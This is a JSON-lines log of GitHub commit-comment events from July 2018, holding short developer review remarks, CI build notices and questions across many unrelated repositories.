{"id":"7980094758","type":"CommitCommentEvent","actor":{"login":"metafries"},"repo":{"name":"cashviar/hlf"},"payload":{"comment":{"id":29742877,"position":null,"line":null,"path":null,"commit_id":"e18e142ec32ee948439bd98a511cf7d9ffc2b942","created_at":"2018-07-18T01:23:20Z","updated_at":"2018-07-18T01:23:20Z","author_association":"MEMBER","body":"[fabric-samples/chaincode-docker-devmode] $ docker-compose -f docker-compose-simple.yaml up\r\n[fabric-samples/chaincode] $ docker exec -it chaincode bash\r\n[fabric-samples/chaincode] $ cd chaincode_example02\r\n[fabric-samples/chaincode/chaincode_example02] $ go build"}},"created_at":"2018-07-18T01:23:20Z"}
{"id":"7980119761","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742927,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T01:33:00Z","updated_at":"2018-07-18T01:33:00Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-18T01:33:00Z"}
{"id":"7980122634","type":"CommitCommentEvent","actor":{"login":"auturgy"},"repo":{"name":"ugcs/ddc"},"payload":{"comment":{"id":29742934,"position":null,"line":null,"path":null,"commit_id":"1ffe25710a54c1f3c506d6d42523340f575e96d1","created_at":"2018-07-18T01:34:07Z","updated_at":"2018-07-18T01:34:07Z","author_association":"NONE","body":"can you clarify this to state \"modified ArduCopter firmware\" rather than \"custom Pixhawk firmware\".  In this context, Pixhawk is a bit misleading.  Thanks!"}},"created_at":"2018-07-18T01:34:07Z"}
{"id":"7980123546","type":"CommitCommentEvent","actor":{"login":"Sunev"},"repo":{"name":"uhyo/jinrou"},"payload":{"comment":{"id":29742939,"position":8,"line":8,"path":"manual/changelog.jade","commit_id":"d8a804fca44eb275841e4b18ab0571c0d203299e","created_at":"2018-07-18T01:34:26Z","updated_at":"2018-07-18T01:34:26Z","author_association":"CONTRIBUTOR","body":"Actually, I didn't fix this one, because I'm not sure why [```@bury \"other\"```](https://github.com/uhyo/jinrou/blob/bcbfb5573efcfad57b61c93e935815362d347246/server/rpc/game/game.coffee#L1318) comes later than [```pl.votestart```](https://github.com/uhyo/jinrou/blob/bcbfb5573efcfad57b61c93e935815362d347246/server/rpc/game/game.coffee#L1289). 2faa7f8 only sloves scapegoat's sudden death in theory."}},"created_at":"2018-07-18T01:34:26Z"}
{"id":"7980132833","type":"CommitCommentEvent","actor":{"login":"grantberman"},"repo":{"name":"grantberman/lab02-classes-and-objects"},"payload":{"comment":{"id":29742951,"position":null,"line":null,"path":null,"commit_id":"12e4c8b0e0aadb8a230fc66092e24406bd982e77","created_at":"2018-07-18T01:38:00Z","updated_at":"2018-07-18T01:38:00Z","author_association":"OWNER","body":"lab in progress\r\n"}},"created_at":"2018-07-18T01:38:00Z"}
{"id":"7980133871","type":"CommitCommentEvent","actor":{"login":"LiuChangFreeman"},"repo":{"name":"LiuChangFreeman/rbtray"},"payload":{"comment":{"id":29742953,"position":null,"line":null,"path":null,"commit_id":"ee1f2cc21168c72f44a16caf437e3302c594e31b","created_at":"2018-07-18T01:38:26Z","updated_at":"2018-07-18T01:38:26Z","author_association":"OWNER","body":"It‘s a temporary fault for the reason that I couldn't find enough space to place my website in the window. Thanks for pointing out that and I've made up my mistake.  "}},"created_at":"2018-07-18T01:38:26Z"}
{"id":"7980138381","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29742961,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-18T01:40:16Z","updated_at":"2018-07-18T01:40:16Z","author_association":"CONTRIBUTOR","body":"I can confirm that there are some differences in the current version of the user's manual built with the n-t-roff code (from a snapshot prior to the merge) and the typotests code.\n\nAll of the differences I saw were due to letter adjustment resolution in the castle figure on page 34.  The bulk of the individual differences is due to slight shifts of the character positions; there were no differences in the line breaks.\n\nTo confirm the differences were due to LAFACT, I changed LAFACT from 1000 to 10000 in tdef.h in n-t-roff, recompiled the code, and reran the document.  The two versions were then identical (same md5 checksum) after accounting for the different font paths.\n\nWhile it is conceivable that a line might reflow because of this, it would have to be a very borderline condition for it to happen.  Have not looked at the other documents yet."}},"created_at":"2018-07-18T01:40:16Z"}
{"id":"7980140257","type":"CommitCommentEvent","actor":{"login":"ming-zhang"},"repo":{"name":"michaelasper/Holograph"},"payload":{"comment":{"id":29742967,"position":null,"line":null,"path":null,"commit_id":"414f295d01c7e39c8613f3ccddc6ed182d9352c8","created_at":"2018-07-18T01:41:01Z","updated_at":"2018-07-18T01:41:01Z","author_association":"COLLABORATOR","body":"stop"}},"created_at":"2018-07-18T01:41:01Z"}
{"id":"7980140589","type":"CommitCommentEvent","actor":{"login":"ming-zhang"},"repo":{"name":"michaelasper/Holograph"},"payload":{"comment":{"id":29742970,"position":null,"line":null,"path":null,"commit_id":"414f295d01c7e39c8613f3ccddc6ed182d9352c8","created_at":"2018-07-18T01:41:11Z","updated_at":"2018-07-18T01:41:11Z","author_association":"COLLABORATOR","body":"also there's a typo in the commit message"}},"created_at":"2018-07-18T01:41:11Z"}
{"id":"7980143142","type":"CommitCommentEvent","actor":{"login":"gouthambudda"},"repo":{"name":"gouthambudda/gouportfolio"},"payload":{"comment":{"id":29742973,"position":null,"line":null,"path":null,"commit_id":"c30751a24337895fb5cde35a6ee10b9ee1d73d02","created_at":"2018-07-18T01:42:13Z","updated_at":"2018-07-18T01:42:13Z","author_association":"OWNER","body":"www.buddagoutham.com"}},"created_at":"2018-07-18T01:42:13Z"}
{"id":"7980146471","type":"CommitCommentEvent","actor":{"login":"tutul523"},"repo":{"name":"bitpay/bitcore-wallet-service"},"payload":{"comment":{"id":29742978,"position":null,"line":null,"path":null,"commit_id":"318967565194db13e4dde478ce8e4cba91b14d6e","created_at":"2018-07-18T01:43:28Z","updated_at":"2018-07-18T01:43:28Z","author_association":"NONE","body":"318967565194db13e4dde478ce8e4cba91b14d6e"}},"created_at":"2018-07-18T01:43:28Z"}
{"id":"7980146711","type":"CommitCommentEvent","actor":{"login":"michaelhodgejr"},"repo":{"name":"michaelhodgejr/policy-tool-frontend-test"},"payload":{"comment":{"id":29742979,"position":1,"line":1,"path":"src/components/shared/Navigation.js","commit_id":"683d7a0d426bdbe2f3c97c09ca21eff64297d5ac","created_at":"2018-07-18T01:43:34Z","updated_at":"2018-07-18T01:43:34Z","author_association":"OWNER","body":"This is just a navigation component. Can ignore for the purposes of this commit. "}},"created_at":"2018-07-18T01:43:34Z"}
{"id":"7980148028","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29742980,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-18T01:44:04Z","updated_at":"2018-07-18T01:44:04Z","author_association":"NONE","body":"Well -95 dBm is only on specific frequencies... for most of the band I get avg -105 dBm with antenna and -112 dBm without antenna... seems about one S-unit worst than your ZUMspot and very close to your homebrew one... not that huge difference anyway, but I can try later if I can somehow lower it... it may come from my RPi2, ethernet cable coming from switch with other PC's, power adapter, or something close...\r\n\r\nConcerning the recovery issue, I also suspect of something related with MMDVMHost/ircddbgateway... as you say I can always see the recovery at MMDVMHost log but something goes wrong and other people can't hear me after that (either connected to reflector or directly to other ircddbgateway hotspot as if it was a repeater). Hope you can find something, at least an workaround, as least resource something like if the recovery can't start so fast after lost transmission (for some reason?) then delay it a bit before start sending it to ircddbgateway again... just a rough idea... as I really don't know what causes it or have knowledge to fix it, unfortunately :(  Thanks for your time and sorry to be \"spamming\" your commit with my problem."}},"created_at":"2018-07-18T01:44:04Z"}
{"id":"7980148224","type":"CommitCommentEvent","actor":{"login":"michaelhodgejr"},"repo":{"name":"michaelhodgejr/policy-tool-frontend-test"},"payload":{"comment":{"id":29742981,"position":15,"line":11,"path":"src/pages/PolicyCategoryPage.js","commit_id":"683d7a0d426bdbe2f3c97c09ca21eff64297d5ac","created_at":"2018-07-18T01:44:08Z","updated_at":"2018-07-18T01:44:08Z","author_association":"OWNER","body":"Here i'm using the isLoading prop to conditionally display the indicator"}},"created_at":"2018-07-18T01:44:08Z"}
{"id":"7980150240","type":"CommitCommentEvent","actor":{"login":"Artuto"},"repo":{"name":"EndlessBot/Endless"},"payload":{"comment":{"id":29742992,"position":49,"line":258,"path":"src/main/java/me/artuto/endless/Bot.java","commit_id":"a32402955d01db035e2e83e1f3998ef6216ca748","created_at":"2018-07-18T01:44:52Z","updated_at":"2018-07-18T01:44:52Z","author_association":"MEMBER","body":"debug (again)"}},"created_at":"2018-07-18T01:44:52Z"}
{"id":"7980151345","type":"CommitCommentEvent","actor":{"login":"michaelhodgejr"},"repo":{"name":"michaelhodgejr/policy-tool-frontend-test"},"payload":{"comment":{"id":29742997,"position":7,"line":10,"path":"src/reducers/policyCategoryReducer.js","commit_id":"683d7a0d426bdbe2f3c97c09ca21eff64297d5ac","created_at":"2018-07-18T01:45:19Z","updated_at":"2018-07-18T01:45:19Z","author_association":"OWNER","body":"I know these functions are supposed to be \"pure\" which I'm pretty sure this accomplishes."}},"created_at":"2018-07-18T01:45:19Z"}
{"id":"7980154443","type":"CommitCommentEvent","actor":{"login":"woliveiras"},"repo":{"name":"carlosmaniero/pokemon-adoption"},"payload":{"comment":{"id":29743004,"position":3,"line":3,"path":"src/species/SpecieList.js","commit_id":"aaed312aca95d9498ab719d7c12f3dcafbf372a9","created_at":"2018-07-18T01:46:29Z","updated_at":"2018-07-18T01:46:29Z","author_association":"NONE","body":"God are see this double spaces after the imports! "}},"created_at":"2018-07-18T01:46:29Z"}
{"id":"7980158763","type":"CommitCommentEvent","actor":{"login":"Qstick"},"repo":{"name":"Sonarr/Sonarr"},"payload":{"comment":{"id":29743009,"position":10,"line":15,"path":"src/NzbDrone.Core/Download/Clients/Nzbget/NzbgetSettings.cs","commit_id":"9c9ad9aec3a2022ef703393baab3f02305bbba53","created_at":"2018-07-18T01:48:07Z","updated_at":"2018-07-18T01:48:07Z","author_association":"CONTRIBUTOR","body":"@Taloth You added validation to UrlBase for Nzbget, but not for Sabnzbd."}},"created_at":"2018-07-18T01:48:07Z"}
{"id":"7980163079","type":"CommitCommentEvent","actor":{"login":"dd86k"},"repo":{"name":"dd86k/dd86k.github.io"},"payload":{"comment":{"id":29743022,"position":null,"line":null,"path":null,"commit_id":"ae5f3b1b79a7b5d9f0c079c3c0e784775857d80a","created_at":"2018-07-18T01:49:45Z","updated_at":"2018-07-18T01:49:45Z","author_association":"OWNER","body":"Please note that I am not yet a fan of wine -- Such as Porto."}},"created_at":"2018-07-18T01:49:45Z"}
{"id":"7980165513","type":"CommitCommentEvent","actor":{"login":"jtrtj"},"repo":{"name":"jtrtj/chromotherapy"},"payload":{"comment":{"id":29743028,"position":5,"line":26,"path":"spec/features/admin/admin_powers_spec.rb","commit_id":"4bc5dbb65a9b6e650fe6f363f81ef0753ac69d95","created_at":"2018-07-18T01:50:37Z","updated_at":"2018-07-18T01:50:37Z","author_association":"OWNER","body":"@iandouglas\r\n\r\nthese crud functionality tests arent working but I can delete and edit fine if i run the rails server and login as admin."}},"created_at":"2018-07-18T01:50:37Z"}
{"id":"7980170032","type":"CommitCommentEvent","actor":{"login":"a136489"},"repo":{"name":"Ipasss/example"},"payload":{"comment":{"id":29743041,"position":null,"line":null,"path":null,"commit_id":"1a6f9d80ee1b615e293cda4f92c848c5273ab373","created_at":"2018-07-18T01:52:20Z","updated_at":"2018-07-18T01:52:20Z","author_association":"NONE","body":"在會出現 warning 的 chunk 的 {r} 裡面加上 warning = FALSE\r\n像這樣：{r, warning = FALSE}"}},"created_at":"2018-07-18T01:52:20Z"}
{"id":"7980170376","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29743043,"position":55,"line":85,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-18T01:52:28Z","updated_at":"2018-07-18T01:52:28Z","author_association":"NONE","body":"Sorry, I was talking about the access of Job below."}},"created_at":"2018-07-18T01:52:28Z"}
{"id":"7980174910","type":"CommitCommentEvent","actor":{"login":"dtzWill"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29743048,"position":null,"line":null,"path":null,"commit_id":"caccc40ad01c4159a5a627b17d3db12ac67fa252","created_at":"2018-07-18T01:54:08Z","updated_at":"2018-07-18T01:54:08Z","author_association":"CONTRIBUTOR","body":"We could disable this option I think, which is new in 1.29.0:\r\n\r\n`Use internal resolver code instead of libc (FEATURE_NSLOOKUP_BIG) [Y/n] (NEW) y `\r\n\r\nOr use musl :P.\r\n\r\nNot sure what use initrd has for nslookup anyway, but I'm assuming it's desired :)."}},"created_at":"2018-07-18T01:54:08Z"}
{"id":"7980177076","type":"CommitCommentEvent","actor":{"login":"EricZhou93"},"repo":{"name":"EricZhou93/taobao-historical-price-tracking"},"payload":{"comment":{"id":29743050,"position":null,"line":null,"path":null,"commit_id":"d7dd0503afe25f7a175387a4e2916e72a62f90b0","created_at":"2018-07-18T01:54:55Z","updated_at":"2018-07-18T01:54:55Z","author_association":"OWNER","body":"Catalogue"}},"created_at":"2018-07-18T01:54:55Z"}
{"id":"7980181368","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"kaneplusplus/stat_agg"},"payload":{"comment":{"id":29743056,"position":null,"line":null,"path":null,"commit_id":"439299be304eb723722adf51fbc870e56f42c97c","created_at":"2018-07-18T01:56:29Z","updated_at":"2018-07-18T01:56:29Z","author_association":"NONE","body":"Hey Mike. First sentence, intended is misspelled. Cool package! "}},"created_at":"2018-07-18T01:56:29Z"}
{"id":"7980182681","type":"CommitCommentEvent","actor":{"login":"annekemyers"},"repo":{"name":"annekemyers/service-manual"},"payload":{"comment":{"id":29743058,"position":null,"line":null,"path":null,"commit_id":"9e172c048fe6b28369fc5b6ecdfc20eec57d34b2","created_at":"2018-07-18T01:56:57Z","updated_at":"2018-07-18T01:56:57Z","author_association":"OWNER","body":"CD will review before approving"}},"created_at":"2018-07-18T01:56:57Z"}
{"id":"7980187664","type":"CommitCommentEvent","actor":{"login":"hark130"},"repo":{"name":"hark130/Latissimus_Dorsi"},"payload":{"comment":{"id":29743065,"position":null,"line":null,"path":null,"commit_id":"4f9423e73d83e8ac3b88ef9040b068da2d5b2827","created_at":"2018-07-18T01:58:51Z","updated_at":"2018-07-18T01:58:51Z","author_association":"OWNER","body":"I believe this is the last known good version of Memoroad.c and Harklethread.c."}},"created_at":"2018-07-18T01:58:51Z"}
{"id":"7980189599","type":"CommitCommentEvent","actor":{"login":"auliaikam"},"repo":{"name":"nailyainulmuf/NaylinProject"},"payload":{"comment":{"id":29743069,"position":null,"line":null,"path":null,"commit_id":"d5bfc81b614f9084864a4d27e5e04d25525eb4d0","created_at":"2018-07-18T01:59:36Z","updated_at":"2018-07-18T01:59:36Z","author_association":"COLLABORATOR","body":"seeting phoo, bukan setting akun user"}},"created_at":"2018-07-18T01:59:36Z"}
{"id":"7981915233","type":"CommitCommentEvent","actor":{"login":"Chromecube"},"repo":{"name":"Chromecube/Postie"},"payload":{"comment":{"id":29747066,"position":null,"line":null,"path":null,"commit_id":"3b57dfeff6b7ed2f19b9e3562907f467443a692e","created_at":"2018-07-18T10:00:46Z","updated_at":"2018-07-18T10:00:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Alerts](https://trello.com/c/5aT7Njyw/10-alerts)"}},"created_at":"2018-07-18T10:00:46Z"}
{"id":"7981920716","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747082,"position":30,"line":30,"path":"app/tests.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T10:01:48Z","updated_at":"2018-07-18T10:01:48Z","author_association":"NONE","body":"чтоб не определяьб в каждом тесте Client(). Это можно сделать один раз в setUp()\r\nself.client = Client(). И использовать во всех тестах этого класса"}},"created_at":"2018-07-18T10:01:48Z"}
{"id":"7981920865","type":"CommitCommentEvent","actor":{"login":"YoungDeeZH"},"repo":{"name":"YoungDeeZH/vue-webpack-todo"},"payload":{"comment":{"id":29747083,"position":null,"line":null,"path":null,"commit_id":"3ecc81dd335abad6e3db014cfdfef425a74184dd","created_at":"2018-07-18T10:01:50Z","updated_at":"2018-07-18T10:01:50Z","author_association":"OWNER","body":"1、父组件可以使用 props 把数据传给子组件。\r\n2、子组件可以使用 $emit 触发父组件的自定义事件。"}},"created_at":"2018-07-18T10:01:50Z"}
{"id":"7981924345","type":"CommitCommentEvent","actor":{"login":"manivet"},"repo":{"name":"morteza-gho/circlepacking"},"payload":{"comment":{"id":29747090,"position":null,"line":null,"path":null,"commit_id":"64f49ab337aa3c6db778b76bdc479a4dc72cd913","created_at":"2018-07-18T10:02:29Z","updated_at":"2018-07-18T10:02:29Z","author_association":"NONE","body":"how to get emoji folder from emojione.com??\r\n"}},"created_at":"2018-07-18T10:02:29Z"}
{"id":"7981926081","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":29747094,"position":null,"line":null,"path":null,"commit_id":"44fbf56a3a13d19650b0bf4e7b1a8c08913ef2c0","created_at":"2018-07-18T10:02:49Z","updated_at":"2018-07-18T10:02:49Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 516](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1927&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2018-07-18T10:02:49Z"}
{"id":"7981929045","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747104,"position":32,"line":32,"path":"app/tests.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T10:03:24Z","updated_at":"2018-07-18T10:03:24Z","author_association":"NONE","body":"тут лучше исаользовать self.ssertEqual(response.status_code, 200). Так как тут просто 2 значения"}},"created_at":"2018-07-18T10:03:24Z"}
{"id":"7981934112","type":"CommitCommentEvent","actor":{"login":"Raz0r"},"repo":{"name":"montekki/www"},"payload":{"comment":{"id":29747122,"position":23,"line":217,"path":"content/posts/detecting-web-attacks-rnn.md","commit_id":"6681e12179210bc213224fa5bbf259bd14a3393e","created_at":"2018-07-18T10:04:22Z","updated_at":"2018-07-18T10:04:22Z","author_association":"NONE","body":"web applications (lower-case because it's not a name)"}},"created_at":"2018-07-18T10:04:22Z"}
{"id":"7981934865","type":"CommitCommentEvent","actor":{"login":"dgaubert"},"repo":{"name":"CartoDB/Windshaft"},"payload":{"comment":{"id":29747127,"position":null,"line":null,"path":null,"commit_id":"a7199ca95bd4c16736e1e2c22b25b0412755da04","created_at":"2018-07-18T10:04:31Z","updated_at":"2018-07-18T10:04:31Z","author_association":"CONTRIBUTOR","body":"Obviously, it forces you to create a new branch in `Windshaft-cartodb` to point to this branch."}},"created_at":"2018-07-18T10:04:31Z"}
{"id":"7981937204","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29747134,"position":null,"line":null,"path":null,"commit_id":"fe8fb89cd52dfb4d678c5b8ba70c3c15c17b2b10","created_at":"2018-07-18T10:04:59Z","updated_at":"2018-07-18T10:04:59Z","author_association":"CONTRIBUTOR","body":"No problem!"}},"created_at":"2018-07-18T10:04:59Z"}
{"id":"7981940242","type":"CommitCommentEvent","actor":{"login":"Cftn"},"repo":{"name":"IoTKETI/oneM2MBrowser"},"payload":{"comment":{"id":29747138,"position":null,"line":null,"path":null,"commit_id":"7f70521f6beeeca8ae10f386e1794532426eb9c3","created_at":"2018-07-18T10:05:25Z","updated_at":"2018-07-18T10:05:25Z","author_association":"COLLABORATOR","body":"Reported error corrected version"}},"created_at":"2018-07-18T10:05:25Z"}
{"id":"7981940737","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29747139,"position":null,"line":null,"path":null,"commit_id":"bedcc4b588238286a58bcb085662878456df9bbb","created_at":"2018-07-18T10:05:30Z","updated_at":"2018-07-18T10:05:30Z","author_association":"OWNER","body":"完成 第四章 优化页面"}},"created_at":"2018-07-18T10:05:30Z"}
{"id":"7981941389","type":"CommitCommentEvent","actor":{"login":"Raz0r"},"repo":{"name":"montekki/www"},"payload":{"comment":{"id":29747143,"position":27,"line":221,"path":"content/posts/detecting-web-attacks-rnn.md","commit_id":"6681e12179210bc213224fa5bbf259bd14a3393e","created_at":"2018-07-18T10:05:38Z","updated_at":"2018-07-18T10:05:38Z","author_association":"NONE","body":"web attack detection"}},"created_at":"2018-07-18T10:05:38Z"}
{"id":"7981944760","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747146,"position":110,"line":110,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:06:17Z","updated_at":"2018-07-18T10:06:17Z","author_association":"NONE","body":"https://www.awesomescreenshot.com/image/3494847/c44244ab7ccf228f8924ac7a4d306028\r\nЛоготип зїхав\r\n\r\nНа кожному логотипі повинен бути лінк. Коли це сайт, лінк повинен вести на головну сторінку"}},"created_at":"2018-07-18T10:06:17Z"}
{"id":"7981947848","type":"CommitCommentEvent","actor":{"login":"TheAdminator"},"repo":{"name":"nvuio/discord-translator-i18n"},"payload":{"comment":{"id":29747148,"position":null,"line":null,"path":null,"commit_id":"6ac5308da2657d48c414d5c90cef02718a771a2f","created_at":"2018-07-18T10:06:54Z","updated_at":"2018-07-18T10:06:54Z","author_association":"NONE","body":"Great! "}},"created_at":"2018-07-18T10:06:54Z"}
{"id":"7981949482","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747154,"position":104,"line":104,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:07:14Z","updated_at":"2018-07-18T10:07:14Z","author_association":"NONE","body":"Якийсь дуже малий шрифт. В дизайні такий був?"}},"created_at":"2018-07-18T10:07:14Z"}
{"id":"7981956633","type":"CommitCommentEvent","actor":{"login":"scls19fr"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29747166,"position":23,"line":246,"path":"stdlib/Pkg/docs/src/index.md","commit_id":"2ae70d8c98731f4462638c206a3f1e0be9471357","created_at":"2018-07-18T10:08:38Z","updated_at":"2018-07-18T10:08:38Z","author_association":"CONTRIBUTOR","body":"It will be great to explain here how to quit Pkg REPL-mode to Julia REPL-mode"}},"created_at":"2018-07-18T10:08:38Z"}
{"id":"7981957159","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747169,"position":18,"line":18,"path":"app/tests.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T10:08:45Z","updated_at":"2018-07-18T10:08:45Z","author_association":"NONE","body":"Для того чтобы тесты сработали надо переопреледить метод setUp()\r\ndef setUp(self):\r\n       super(UserTestCase, self).setUp()"}},"created_at":"2018-07-18T10:08:45Z"}
{"id":"7981958562","type":"CommitCommentEvent","actor":{"login":"bdrum"},"repo":{"name":"alisw/AliRoot"},"payload":{"comment":{"id":29747173,"position":null,"line":null,"path":null,"commit_id":"0fd68f051ee4fdbf02ce5cdc2de7028508575b64","created_at":"2018-07-18T10:09:00Z","updated_at":"2018-07-18T10:09:00Z","author_association":"CONTRIBUTOR","body":"Hello Dario,\r\n\r\nthanks for your commit.\r\nOne problem with this:\r\n```c++\r\nstd::ifstream f(inputName);\r\nstd::stringstream strStream;\r\nstrStream << f.rdbuf();\r\nTString inputCSS = TString(strStream.str());\r\n```\r\nWe wrote all our examples and tests with usage of environment variables like this $AliRoot_SRC, so such code doesn't work with string like this one: \"$AliRoot_SRC/STAT/test/...\"\r\n\r\nCould you wait a bit time, I already testing my version, actually it's the same, but I added hard coding replace, may be we can do something more better later.\r\n\r\n\r\n"}},"created_at":"2018-07-18T10:09:00Z"}
{"id":"7981958929","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"Enet4/byteorder-runtime"},"payload":{"comment":{"id":29747174,"position":102,"line":102,"path":"src/lib.rs","commit_id":"d1530b9f3cfbfbca3086e054420fdfa426c6f354","created_at":"2018-07-18T10:09:05Z","updated_at":"2018-07-18T10:09:05Z","author_association":"NONE","body":"Interessant, wasn't aware of that."}},"created_at":"2018-07-18T10:09:05Z"}
{"id":"7981959105","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29747175,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T10:09:07Z","updated_at":"2018-07-18T10:09:07Z","author_association":"OWNER","body":"Oh, I was not aware of that. \r\nSo if I declare a function with `pure` and then I 'call' I don't leave any trace behind where someone could read the call contents ? I knew that 'view' and 'pure' functions do not change the state, but I always thought that the calls you make to these transactions could be picked up by other nodes?\r\n"}},"created_at":"2018-07-18T10:09:07Z"}
{"id":"7981959335","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747177,"position":110,"line":110,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:09:10Z","updated_at":"2018-07-18T10:09:10Z","author_association":"NONE","body":"margin-left: 600px\r\nНіколи не роби таких великих марджінів і це явно не хороший спосів відцентрувати елемент."}},"created_at":"2018-07-18T10:09:10Z"}
{"id":"7981961260","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747183,"position":24,"line":24,"path":"app/tests.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T10:09:33Z","updated_at":"2018-07-18T10:09:33Z","author_association":"NONE","body":"лишние пробелы"}},"created_at":"2018-07-18T10:09:33Z"}
{"id":"7981961516","type":"CommitCommentEvent","actor":{"login":"scls19fr"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29747184,"position":23,"line":246,"path":"stdlib/Pkg/docs/src/index.md","commit_id":"2ae70d8c98731f4462638c206a3f1e0be9471357","created_at":"2018-07-18T10:09:36Z","updated_at":"2018-07-18T10:09:36Z","author_association":"CONTRIBUTOR","body":"It seems to be using `backspace` key."}},"created_at":"2018-07-18T10:09:36Z"}
{"id":"7981962432","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747187,"position":27,"line":27,"path":"app/models/concerns/automatic_date_concern.rb","commit_id":"53b61eb2631ce65986f145d98da05e2d14307950","created_at":"2018-07-18T10:09:45Z","updated_at":"2018-07-18T10:09:45Z","author_association":"CONTRIBUTOR","body":"before_update"}},"created_at":"2018-07-18T10:09:45Z"}
{"id":"7981963909","type":"CommitCommentEvent","actor":{"login":"mrhso"},"repo":{"name":"lziad/discord-irc"},"payload":{"comment":{"id":29747189,"position":35,"line":447,"path":"lib/bot.js","commit_id":"c1f5ce819d3b6b0f55e49db20050cd2f9e05c24c","created_at":"2018-07-18T10:10:03Z","updated_at":"2018-07-18T10:10:03Z","author_association":"NONE","body":"这里「peeye」显然是写错了罢。"}},"created_at":"2018-07-18T10:10:03Z"}
{"id":"7981965002","type":"CommitCommentEvent","actor":{"login":"Cftn"},"repo":{"name":"IoTKETI/oneM2MBrowser"},"payload":{"comment":{"id":29747193,"position":null,"line":null,"path":null,"commit_id":"8f35259860765d10ee1d9e214f0d248f4e0f0e02","created_at":"2018-07-18T10:10:15Z","updated_at":"2018-07-18T10:10:15Z","author_association":"COLLABORATOR","body":"Upload Installer_v1.1.0.01.zip"}},"created_at":"2018-07-18T10:10:15Z"}
